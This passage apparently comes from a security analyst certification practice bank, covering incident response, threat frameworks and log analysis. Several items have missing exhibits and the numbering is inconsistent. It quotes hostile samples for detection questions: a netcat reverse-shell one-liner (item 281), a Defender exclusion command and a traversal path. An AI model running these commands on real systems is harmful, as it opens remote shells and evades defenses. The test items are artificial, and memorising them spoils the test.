• A. Creation time of dropper

• B. Registry artifacts
• C. EDR data
• D. Prefetch files
• E. File system metadata
• F. Sysmon event log
222 - When undertaking a cloud migration of multiple SaaS applications, an organization's
systems administrators struggled with the complexity of extending identity and access
management to cloud-based assets. Which of the following service models would have
reduced the complexity of this project?

• A. CASB
• B. SASE
• C. ZTNA
• D. SWG

223 - A security analyst reviews the following extract of a vulnerability scan that was
performed against the web server:

Which of the following recommendations should the security analyst provide to harden
the web server?

• A. Remove the version information on http-server-header.

• B. Disable tcp_wrappers.
• C. Delete the /[Link] folder.
• D. Close port 22.

224 - A security analyst is responding to an incident that involves a malicious attack on a

network data closet. Which of the following best explains how the analyst should properly
document the incident?

• A. Back up the configuration file for all network devices.

• B. Record and validate each connection.
• C. Create a full diagram of the network infrastructure.
• D. Take photos of the impacted items.

225 - A cybersecurity analyst is participating with the DLP project team to classify the
organization's data. Which of the following is the primary purpose for classifying data?

• A. To identify regulatory compliance requirements

• B. To facilitate the creation of DLP rules
 • C. To prioritize IT expenses
• D. To establish the value of data to the organization

226 - A security analyst observed the following activity from a privileged account:

• Accessing emails and sensitive information

• Audit logs being modified
• Abnormal log-in times

Which of the following best describes the observed activity?

• A. Irregular peer-to-peer communication

• B. Unauthorized privileges
• C. Rogue devices on the network
• D. Insider attack

227 - A vulnerability management team found four major vulnerabilities during an

assessment and needs to provide a report for the proper prioritization for further
mitigation. Which of the following vulnerabilities should have the highest priority for the
mitigation process?

• A. A vulnerability that has related threats and IoCs, targeting a different industry
• B. A vulnerability that is related to a specific adversary campaign, with IoCs
found in the SIEM
• C. A vulnerability that has no adversaries using it or associated IoCs
• D. A vulnerability that is related to an isolated system, with no IoCs

228 - A security analyst received an alert regarding multiple successful MFA log-ins for a
particular user. When reviewing the authentication logs, the analyst sees the following:

Which of the following are most likely occurring, base on the MFA logs? (Choose two.)

• A. Dictionary attack
• B. Push phishing
• C. Impossible geo-velocity
• D. Subscriber identity module swapping
• E. Rogue access point
• F. Password spray
229 - A security analyst has identified a new malware file that has impacted the
organization. The malware is polymorphic and has built-in conditional triggers that require
a connection to the internet. The CPU has an idle process of at least 70%. Which of the
following best describes how the security analyst can effectively review the malware
without compromising the organization’s network?

• A. Utilize an RDP session on an unused workstation to evaluate the malware.

• B. Disconnect and utilize an existing infected asset off the network.
• C. Create a virtual host for testing on the security analyst workstation.
• D. Subscribe to an online service to create a sandbox environment.

230 - Which of the following threat-modeling procedures is in the OWASP Web Security
Testing Guide?

• A. Review of security requirements

• B. Compliance checks
• C. Decomposing the application
• D. Security by design

231 - Which of the following would an organization use to develop a business continuity
plan?

• A. A diagram of all systems and interdependent applications

• B. A repository for all the software used by the organization
• C. A prioritized list of critical systems defined by executive leadership
• D. A configuration management database in print at an off-site location

232 - The management team requests monthly KPI reports on the company’s
cybersecurity program. Which of the following KPIs would identify how long a security
threat goes unnoticed in the environment?

• A. Employee turnover
• B. Intrusion attempts
• C. Mean time to detect
• D. Level of preparedness

233 - Which of the following best describes the key elements of a successful information
security program?

• A. Business impact analysis, asset and change management, and security

communication plan
• B. Security policy implementation, assignment of roles and responsibilities, and
information asset classification
• C. Disaster recovery and business continuity planning, and the definition of
access control requirements and human resource policies
• D. Senior management organizational structure, message distribution standards,
and procedures for the operation of security management systems
234 - A systems administrator notices unfamiliar directory names on a production server.
The administrator reviews the directory listings and files, and then concludes the server
has been compromised. Which of the following steps should the administrator take next?

• A. Inform the internal incident response team.

• B. Follow the company's incident response plan.
• C. Review the lessons learned for the best approach.
• D. Determine when the access started.

235 - Which of the following is a nation-state actor least likely to be concerned with?

• A. Detection by MITRE ATT&CK framework.

• B. Detection or prevention of reconnaissance activities.
• C. Examination of its actions and objectives.
• D. Forensic analysis for legal action of the actions taken.

236 - Which of the following is a commonly used four-component framework to

communicate threat actor behavior?

• A. STRIDE
• B. Diamond Model of Intrusion Analysis
• C. Cyber Kill Chain
• D. MITRE ATT&CK

237 - An employee downloads a freeware program to change the desktop to the classic
look of legacy Windows. Shortly after the employee installs the program, a high volume of
random DNS queries begin to originate from the system. An investigation on the system
reveals the following:

Add-MpPreference –ExclusionPath ‘%Program Files%\ksyconfig’

Which of the following is possibly occurring?

• A. Persistence
• B. Privilege escalation
• C. Credential harvesting
• D. Defense evasion

238 - An organization discovered a data breach that resulted in PII being released to the
public. During the lessons learned review, the panel identified discrepancies regarding
who was responsible for external reporting, as well as the timing requirements. Which of
the following actions would best address the reporting issue?

• A. Creating a playbook denoting specific SLAs and containment actions per

incident type
• B. Researching federal laws, regulatory compliance requirements, and
organizational policies to document specific reporting SLAs
 • C. Defining which security incidents require external notifications and incident
reporting in addition to internal stakeholders
• D. Designating specific roles and responsibilities within the security team and
stakeholders to streamline tasks

239 - During an incident, a security analyst discovers a large amount of PII has been
emailed externally from an employee to a public email address. The analyst finds that the
external email is the employee’s personal email. Which of the following should the analyst
recommend be done first?

• A. Place a legal hold on the employee’s mailbox.

• B. Enable filtering on the web proxy.
• C. Disable the public email access with CASB.
• D. Configure a deny rule on the firewall.

240 - Which of the following can be used to learn more about TTPs used by
cybercriminals?

• A. ZenMAP
• B. MITRE ATT&CK
• C. National Institute of Standards and Technology
• D. theHarvester

241 - Which of the following statements best describes the MITRE ATT&CK framework?

• A. It provides a comprehensive method to test the security of applications.

• B. It provides threat intelligence sharing and development of action and mitigation
strategies.
• C. It helps identify and stop enemy activity by highlighting the areas where an
attacker functions.
• D. It tracks and understands threats and is an open-source project that evolves.
• E. It breaks down intrusions into a clearly defined sequence of phases.

242 - A Chief Information Security Officer (CISO) is concerned that a specific threat actor
who is known to target the company’s business type may be able to breach the network
and remain inside of it for an extended period of time. Which of the following techniques
should be performed to meet the CISO’s goals?

• A. Vulnerability scanning
• B. Adversary emulation
• C. Passive discovery
• D. Bug bounty
243 - A security analyst receives an alert for suspicious activity on a company laptop. An
excerpt of the log is shown below:

Which of the following has most likely occurred?

• A. An Office document with a malicious macro was opened.

• B. A credential-stealing website was visited.
• C. A phishing link in an email was clicked.
• D. A web browser vulnerability was exploited.

244 - During an incident, some IoCs of possible ransomware contamination were found in
a group of servers in a segment of the network. Which of the following steps should be
taken next?

• A. Isolation
• B. Remediation
• C. Reimaging
• D. Preservation

245 - An MSSP received several alerts from customer 1, which caused a missed incident
response deadline for customer 2. Which of the following best describes the document
that was violated?

• A. KPI
• B. SLO
• C. SLA
• D. MOU
246 - Which of the following is a reason proper handling and reporting of existing
evidence are important for the investigation and reporting phases of an incident
response?

• A. To ensure the report is legally acceptable in case it needs to be presented in

court
• B. To present a lessons-learned analysis for the incident response team
• C. To ensure the evidence can be used in a postmortem analysis
• D. To prevent the possible loss of a data source for further root cause analysis

247 - An attacker has just gained access to the syslog server on a LAN. Reviewing the
syslog entries has allowed the attacker to prioritize possible next targets. Which of the
following is this an example of?

• A. Passive network footprinting

• B. OS fingerprinting
• C. Service port identification
• D. Application versioning

248 - A security analyst observed the following activities in chronological order:

1. Protocol violation alerts on external firewall

2. Unauthorized internal scanning activity
3. Changes in outbound network performance

Which of the following best describes the goal of the threat actor?

• A. Data exfiltration
• B. Unusual traffic spikes
• C. Rogue devices
• D. Irregular peer-to-peer communication

249 - After reviewing the final report for a penetration test, a cybersecurity analyst
prioritizes the remediation for input validation vulnerabilities. Which of the following
attacks is the analyst seeking to prevent?

• A. DNS poisoning
• B. Pharming
• C. Phishing
• D. Cross-site scripting

250 - During a security test, a security analyst found a critical application with a buffer
overflow vulnerability. Which of the following would be best to mitigate the vulnerability at
the application level?

• A. Perform OS hardening.
• B. Implement input validation.
 • C. Update third-party dependencies.
• D. Configure address space layout randomization.

251 - The SOC received a threat intelligence notification indicating that an employee’s
credentials were found on the dark web. The user’s web and log-in activities were
reviewed for malicious or anomalous connections, data uploads/downloads, and exploits.
A review of the controls confirmed multifactor authentication was enabled. Which of the
following should be done first to mitigate impact to the business networks and assets?

• A. Perform a forced password reset.

• B. Communicate the compromised credentials to the user.
• C. Perform an ad hoc AV scan on the user's laptop.
• D. Review and ensure privileges assigned to the user’s account reflect least
privilege.
• E. Lower the thresholds for SOC alerting of suspected malicious activity

252 - A security analyst is working on a server patch management policy that will allow
the infrastructure team to be informed more quickly about new patches. Which of the
following would most likely be required by the infrastructure team so that vulnerabilities
can be remediated quickly? (Choose two.)

• A. Hostname
• B. Missing KPI
• C. CVE details
• D. POC availabilty
• E. IoCs
• F. npm identifier

253 - Chief Information Security Officer (CISO) wants to disable a functionality on a

business-critical web application that is vulnerable to RCE in order to maintain the
minimum risk level with minimal increased cost. Which of the following risk treatments
best describes what the CISO is looking for?

• A. Transfer
• B. Mitigate
• C. Accept
• D. Avoid

254 - A company has a primary control in place to restrict access to a sensitive database.
However, the company discovered an authentication vulnerability that could bypass this
control. Which of the following is the best compensating control?

• A. Running regular penetration tests to identify and address new vulnerabilities.

• B. Conducting regular security awareness training of employees to prevent social
engineering attacks.
• C. Deploying an additional layer of access controls to verify authorized
individuals.
 • D. Implementing intrusion detection software to alert security teams of
unauthorized access attempts

255 - An analyst discovers unusual outbound connections to an IP that was previously

blocked at the web proxy and firewall. Upon further investigation, it appears that the proxy
and firewall rules that were in place were removed by a service account that is not
recognized. Which of the following parts of the Cyber Kill Chain does this describe?

• A. Delivery
• B. Command and control
• C. Reconnaissance
• D. Weaponization

256 - An organization's email account was compromised by a bad actor. Given the
following information:

Which of the following is the length of time the team took to detect the threat?
 • A. 25 minutes
• B. 40 minutes
• C. 45 minutes
• D. 2 hours

257 - A threat hunter seeks to identify new persistence mechanisms installed in an

organization’s environment. In collecting scheduled tasks from all enterprise
workstations, the following host details are aggregated:

Which of the following actions should the hunter perform first based on the details
above?

• A. Acquire a copy of [Link] from the impacted host.

• B. Scan the enterprise to identify other systems with [Link] present.
• C. Perform a public search for malware reports on the [Link].
• D. Change the account that runs the [Link] scheduled task.

258 - A SOC analyst is analyzing traffic on a network and notices an unauthorized scan.
Which of the following types of activities is being observed?

• A. Potential precursor to an attack

• B. Unauthorized peer-to-peer communication
• C. Rogue device on the network
• D. System updates.
•

259 - HOTSPOT
-

Welcome to the Enterprise Help Desk System. Please work the ticket escalated to you in
the help desk ticket queue.

INSTRUCTIONS
-

Click on the ticket to see the ticket details. Additional content is available on tabs within
the ticket.

First, select the appropriate issue from the drop-down menu. Then, select the MOST likely
root cause from second drop-down menu.
If at any time you would like to bring back the initial state of the simulation, please click
the Reset All button.

Suggested
Answer:
260 - SIMULATION
-

A company recently experienced a security incident. The security team has determined a
user clicked on a link embedded in a phishing email that was sent to the entire company.
The link resulted in a malware download, which was subsequently installed and run.

INSTRUCTIONS
-

Part 1
-

Review the artifacts associated with the security Incident. Identify the name of the
malware, the malicious IP address, and the date and time when the malware executable
entered the organization.
Part 2
-
Review the kill chain items and select an appropriate control for each that would improve
the security posture of the organization and would have helped to prevent this incident
from occurring. Each control may only be used once, and not all controls will be used.

If at any time you would like to bring back the initial state of the simulation, please click
the Reset All button.

Phishing email: Email filtering Active links:

Plain text email format Malicious website access:
IP blocklist Malware download:
Firewall file type filter Malware install:
Restricted local user permissions Malware execution:
Updated antivirus File encryption: Backups

261 - After a breach involving the exfiltration of a large amount of sensitive data, a
security analyst is reviewing the following firewall logs to determine how the breach
occurred.

Which of the following IP addresses does the analyst need to investigate further?

• A. 192.168 1.1
• B. [Link]
• C. [Link]
• D. 192.168 1.193

262 - An analyst reviews a recent government alert on new zero-day threats and finds the
following CVE metrics for the most critical of the vulnerabilities:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:W/RC:R

Which of the following represents the exploit code maturity of this critical vulnerability?

• A. E:U
• B. S:C
• C. RC:R
• D. AV:N
• E. AC:L
263 - A security analyst detects an email server that had been compromised in the
internal network. Users have been reporting strange messages in their email inboxes and
unusual network traffic. Which of the following incident response steps should be
performed next?

• A. Preparation
• B. Validation
• C. Containment
• D. Eradication

264 - A SIEM alert is triggered based on execution of a suspicious one-liner on two

workstations in the organization’s environment. An analyst views the details of these
events below:

Which of the following statements best describes the intent of the attacker, based on this
one-liner?

• A. Attacker is escalating privileges via JavaScript.

• B. Attacker is utilizing custom malware to download an additional script.
• C. Attacker is executing PowerShell script “AccessToken.ps1”.
• D. Attacker is attempting to install persistence mechanisms on the target
machine.

265 - When investigating a potentially compromised host, an analyst observes that the
process [Link] (PID 1024), a Sysinternals tool used to create desktop backgrounds
containing host details, has been running for over two days. Which of the following
activities will provide the best insight into this potentially malicious process, based on the
anomalous behavior?

• A. Changes to system environment variables

• B. SMB network traffic related to the system process
• C. Recent browser history of the primary user
• D. Activities taken by PID 1024

266 - Which of the following evidence collection methods is most likely to be acceptable
in court cases?

• A. Copying all access files at the time of the incident

• B. Creating a file-level archive of all files
• C. Providing a full system backup inventory
• D. Providing a bit-level image of the hard drive
267 - A cybersecurity analyst has recovered a recently compromised server to its previous
state. Which of the following should the analyst perform next?

• A. Eradication
• B. Isolation
• C. Reporting
• D. Forensic analysis

268 - SIMULATION
-

You are a penetration tester who is reviewing the system hardening guidelines for a
company's distribution center. The company's hardening guidelines indicate the
following:

• There must be one primary server or service per device.

• Only default ports should be used.
• Non-secure protocols should be disabled.
• The corporate Internet presence should be placed in a protected subnet.

INSTRUCTIONS
-

Using the tools available, discover devices on the corporate network and the services that
are running on these devices.

You must determine:

• The IP address of each device.

• The primary server or service of each device.
• The protocols that should be disabled based on the hardening guidelines.

If at any time you would like to bring back the initial state of the simulation, please click
the Reset All button.
269 - A cybersecurity analyst has been assigned to the threat-hunting team to create a
dynamic detection strategy based on behavioral analysis and attack patterns. Which of
the following best describes what the analyst will be creating?

• A. Bots
• B. IoCs
• C. TTPs
• D. Signatures

270 - Which of the following would eliminate the need for different passwords for a
variety of internal applications?

• A. CASB
• B. SSO
• C. PAM
• D. MFA

271 - Which of the following best explains the importance of communicating with staff
regarding the official public communication plan related to incidents impacting the
organization?

• A. To establish what information is allowed to be released by designated

employees
• B. To designate an external public relations firm to represent the organization
• C. To ensure that all news media outlets are informed at the same lime
• D. To define how each employee will be contacted after an event occurs

272 - Which of the following would most likely be used to update a dashboard that
integrates with multiple vendor tools?

• A. Webhooks
• B. Extensible Markup Language
• C. Threat feed combination
• D. JavaScript Object Notation

273 - An organization has a critical financial application hosted online that does not allow
event logging to send to the corporate SIEM. Which of the following is the best option for
the security analyst to configure to improve the efficiency of security operations?

• A. Configure a new SIEM specific to the management of the hosted environment.

• B. Subscribe to a threat feed related to the vendor's application.
• C. Use a vendor-provided API to automate pulling the logs in real time.
• D. Download and manually import the logs outside of business hours.
•
274 - After an incident, a security analyst needs to perform a forensic analysis to report
complete information to a company stakeholder. Which of the following is most likely the
goal of the forensic analysis in this case?

• A. Provide a full picture of the existing risks.

• B. Notify law enforcement of the incident.
• C. Further contain the incident.
• D. Determine root cause information.

275 - Which of the following is the most important reason for an incident response team
to develop a formal incident declaration?

• A. To require that an incident be reported through the proper channels

• B. To identify and document staff who have the authority to decrease an incident
• C. To allow for public disclosure of a security event impacting the organization
• D. To establish the department that responsible for responding to an incidente

276 - An organization has establish a formal change management process after

experiencing several critical system failures over the past year. Which of the following are
key factors that the change management process will include in order to reduce the
impact of system failures? (Choose two.)

• A. Ensure users the document system recovery plan prior to deployment.

• B. Perform a full system-level backup following the change.
• C. Leverage an audit tool to identify changes that are being made.
• D. Identify assets with dependence that could be impacted by the change.
• E. Require diagrams to be completed for all critical systems.
• F. Ensure that all assets are properly listed in the inventory management system.

277 - An analyst is suddenly unable to enrich data from the firewall. However, the other
open intelligence feeds continue to work. Which of the following is the most likely reason
in the firewall feed stopped working?

• A. The firewall service account was locked out.

• B. The firewall was using a paid feed.
• C. The firewall certificate expired.
• D. The firewall failed open.

278 - A security analyst would like to integrate two different SaaS-based security toots so
that one tool can notify the other in the event a threat is detected. Which of the following
should the analyst utilize to best accomplish this goal?

• A. SMB share
• B. API endpoint
• C. SMTP notification
• D. SNMP trap
279 - An analyst is imaging a hard drive that was obtained from the system of an
employee who is suspected of going rogue. The analyst notes that the initial hash of the
evidence drive does not match the resultant hash of the imaged copy. Which of the
following best describes the reason for the conflicting investigative findings?

• A. Chain of custody was not maintained for the evidence drive.

• B. Legal authorization was not obtained prior to seizing the evidence drive.
• C. Data integrity of the imaged drive could not be verified.
• D. Evidence drive imaging was performed without a write blocker.

280 - A development team is preparing to roll out a beta version of a web application and
wants to quickly test for vulnerabilities, including SQL injection, path traversal, and cross-
site scripting. Which of the following tools would the security team most likely
recommend to perform this test?

• A. Hashcat
• B. OpenVAS
• C. OWASP ZAP
• D. Nmap

281 - A security analyst detected the following suspicious activity:

rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc [Link] 1234 > tmp/f

Which of the following most likely describes the activity?

• A. Network pivoting
• B. Host scanning
• C. Privilege escalation
• D. Reverse shell

282 - An analyst is designing a message system for a bank. The analyst wants to include
a feature that allows the recipient of a message to prove to a third party that the message
came from the sender.

Which of the following information security goals is the analyst most likely trying to
achieve?

• A. Non-repudiation
• B. Authentication
• C. Authorization
• D. Integrity
283 - Before adopting a disaster recovery plan, some team members need to gather in a
room to review the written scenarios. Which of the following best describes what the
team is doing?

• A. Simulation
• B. Tabletop exercise
• C. Full test
• D. Parallel test

284 - Which of the following entities should an incident manager work with to ensure
correct processes are adhered to when communicating incident reporting to the general
public, as a best practice? (Choose two.)

• A. Law enforcement
• B. Governance
• C. Legal
• D. Manager
• E. Public relations
• F. Human resources

285 - Due to an incident involving company devices, an incident responder needs to take a
mobile phone to the lab for further investigation. Which of the following tools should be
used to maintain the integrity of the mobile phone while it is transported? (Choose two.)

• A. Signal-shielded bag
• B. Tamper-evident seal
• C. Thumb drive
• D. Crime scene tape
• E. Write blocker
• F. Drive duplicator

286 - During the rollout of a patch to the production environment, it was discovered that
required connections to remote systems are no longer possible. Which of the following
steps would have most likely revealed this gap?

• A. Implementation
• B. User acceptance testing
• C. Validation
• D. Rollback
287 - An organization has tracked several incidents that are listed in the following table:

Which of the following is the organization’s MTTD?

• A. 140
• B. 150
• C. 160
• D. 180

288 - A security analyst has found a moderate-risk item in an organization’s point-of-sale

application. The organization is currently in a change freeze window and has decided that
the risk is not high enough to correct at this time. Which of the following inhibitors to
remediation does this scenario illustrate?

• A. Service-level agreement
• B. Business process interruption
• C. Degrading functionality
• D. Proprietary system

299 - While reviewing the web server logs, a security analyst notices the following snippet:

..\../..\../[Link]

Which of the following is being attempted?

• A. Directory traversal
• B. Remote file inclusion
• C. Cross-site scripting
• D. Remote code execution
• E. Enumeration of /etc/passwd

290 - Exploit code for a recently disclosed critical software vulnerability was publicly
available for download for several days before being removed. Which of the following
CVSS v.3.1 temporal metrics was most impacted by this exposure?

• A. Remediation level
• B. Exploit code maturity
• C. Report confidence
• D. Availability
291 - Which of the following in the digital forensics process is considered a critical
activity that often includes a graphical representation of process and operating system
events?

• A. Registry editing
• B. Network mapping
• C. Timeline analysis
• D. Write blocking

292 - Which of the following best describes the importance of KPIs in an incident
response exercise?

• A. To identify the personal performance of each analyst

• B. To describe how incidents were resolved
• C. To reveal what the team needs to prioritize
• D. To expose which tools should be used

293 - An organization is conducting a pilot deployment of an e-commerce application. The

application’s source code is not available. Which of the following strategies should an
analyst recommend to evaluate the security of the software?

• A. Static testing
• B. Vulnerability testing
• C. Dynamic testing
• D. Penetration testing

294 - A security team needs to demonstrate how prepared the team is in the event of a
cyberattack. Which of the following would best demonstrate a real-world incident without
impacting operations?

• A. Review lessons-learned documentation and create a playbook.

• B. Gather all internal incident response party members and perform a simulation.
• C. Deploy known malware and document the remediation process.
• D. Schedule a system recovery to the DR site for a few applications.

295 - A SOC receives several alerts indicating user accounts are connecting to the
company’s identity provider through non-secure communications. User credentials for
accessing sensitive, business-critical systems could be exposed. Which of the following
logs should the SOC use when determining malicious intent?

• A. DNS
• B. tcpdump
• C. Directory
• D. IDS
296 - A vulnerability scan of a web server that is exposed to the internet was recently
completed. A security analyst is reviewing the resulting vector strings:

Which of the following vulnerabilities should be patched first?

• A. Vulnerability 1
• B. Vulnerability 2
• C. Vulnerability 3
• D. Vulnerability 4

297 - Each time a vulnerability assessment team shares the regular report with other
teams, inconsistencies regarding versions and patches in the existing infrastructure are
discovered. Which of the following is the best solution to decrease the inconsistencies?

• A. Implementing credentialed scanning

• B. Changing from a passive to an active scanning approach
• C. Implementing a central place to manage IT assets
• D. Performing agentless scanning

298 - An organization plans to use an advanced machine-learning tool as a central

collection server. The tool will perform data aggregation and analysis. Which of the
following should the organization implement?

• A. SIEM
• B. Firewalls
• C. Syslog server
• D. Flow analysis

299 - A vulnerability analyst is writing a report documenting the newest, most critical
vulnerabilities identified in the past month. Which of the following public MITRE
repositories would be best to review?

• A. Cyber Threat Intelligence

• B. Common Vulnerabilities and Exposures
• C. Cyber Analytics Repository
• D. ATT&CK

300 - A corporation wants to implement an agent-based endpoint solution to help:

• Flag various threats

• Review vulnerability feeds
• Aggregate data
• Provide real-time metrics by using scripting languages

Which of the following tools should the corporation implement to reach this goal?

• A. DLP
• B. Heuristics
• C. SOAR
• D. NAC

301 - A new SOC manager reviewed findings regarding the strengths and weaknesses of
the last tabletop exercise in order to make improvements. Which of the following should
the SOC manager utilize to improve the process?

• A. The most recent audit report

• B. The incident response playbook
• C. The incident response plan
• D. The lessons-learned register

302 - Which of the following techniques can be implemented to safeguard the

confidentiality of sensitive information while allowing limited access to authorized
individuals?

• A. Deidentification
• B. Hashing
• C. Masking
• D. Salting